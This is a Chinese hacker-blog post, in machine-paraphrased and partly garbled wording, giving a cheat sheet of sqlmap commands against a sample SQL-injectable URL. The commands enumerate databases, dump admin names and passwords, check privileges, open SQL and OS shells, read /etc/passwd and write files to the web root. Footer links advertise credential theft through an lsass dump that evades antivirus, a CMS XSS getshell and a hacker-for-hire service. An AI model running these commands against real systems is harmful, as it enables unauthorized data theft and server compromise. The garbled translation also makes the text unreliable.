最常见的Sqlmap用法

hacker4年前 (2020-06-02)黑客文章666

Sqlmap是一个技术专业的SQL引入专用工具，使用 *** 也许多，实际可以用"sqlmap -hh"查询详细的指令帮助文件，我这仅仅给大伙儿共享一些最常见的Sqlmap用法：

一、Sqlmap引入篇

1、查验引入点

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11

2、爆全部数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --dbs

爆当今数据库查询信息内容

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --current-db

3、列举特定数据库查询全部的表名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 -D fujieace --tables

'fujieace' 为特定数据库查询名字

4、列举特定表名的全部字段名

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 -D vhost48330 -T admin --columns

'admin' 为特定表名字

5、dump输出打印表名特定列姓名段的值数据信息

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 -D vhost48330 -T admin -C name,password --dump

'name，password' 为特定字段称

二、Sqlmap用户权限篇

1、列举数据库查询智能管理系统客户：

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --users

查询当今数据库连接客户：

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --current-user

2、分辨当今客户是不是DBA？

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --is-dba

3、查询用户权限：

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --privileges

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --privileges -U fujieace

三、Sqlmap文件实际操作与shell提权篇

1、sql shell

这儿根据sqlmap能够立即获得一个sql shell，立即实行sql语句开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --sql-shell
sql-shell> select version();

留意：这儿因为进入了sql shell能够实行sql语句了，还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入；

2、cmd shell

这里根据sqlmap能够立即获得一个cmd shell，立即实行cmd指令开展互动。

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --os-shell

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --os-cmd=ipconfig

3、载入 *** 服务器上特定文档

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --file-read=/etc/passwd

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --file-read=d:/test.txt

4、载入本地文件到 *** 服务器上

[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id＝11 --file-write /test/test.txt --file-dest /var/www/html/1.txt

标签: 黑客技术

返回列表

上一篇：JohnRipper是“最后的”登陆密码黑客工具!专用工

下一篇：我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

绕过杀毒软件抓取windows密码

使用procdump,由于是微软的东西,带微软签名杀软不会报毒。 procdump -accepteula -ma lsass.exe lsass.dmp copy出 ls...

dede xss通杀所有版本漏洞

漏洞原因：DEDECMS由于编辑器过滤不严，将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢？能getshell的都算0Day（鸡肋发挥起来也能变凤凰）目前只是测试过5.3到...

对于提权成功后3389连不上的几种解决办法

有时候我们入侵提完权后，3389端口开了，可还是没办法连3389，这是非常蛋疼的一件事。连不上通常用以下几种可能以及对应的解决办法。提供一些思路和方法。方法一：网站服务器在内网。...

黑客接单平台:邮箱破解的原理和方法

黑客接单网：很多人不知道怎么破解邮箱，下面我来简单介绍一下：我所讲的是用实际的例子来教大家，例子一，这是登陆163MAIL后产生的一个代码，就是它，包含了163邮箱使用者的密码信息，对I...

AppScan是不是适用全部电脑操作系统?

什么是AppScan？ AppScan在全部运用软件开发生命期中开展安全性测试，在设计阶段初期出示安全系数确保，并开展简单化单元测试卷。该专用工具能够扫描仪很多普遍的系统漏洞，比如HTTP回应切分，...

电脑操作系统检验Nmap使用方法

Nmap是一款网络扫描和服务器检验的十分有效的专用工具。 Nmap不是限于只是搜集信息内容和枚举类型，另外能够用于做为一个系统漏洞探测仪或安全性扫描枪。它能够适用winodws,linux,mac等...

找黑客平台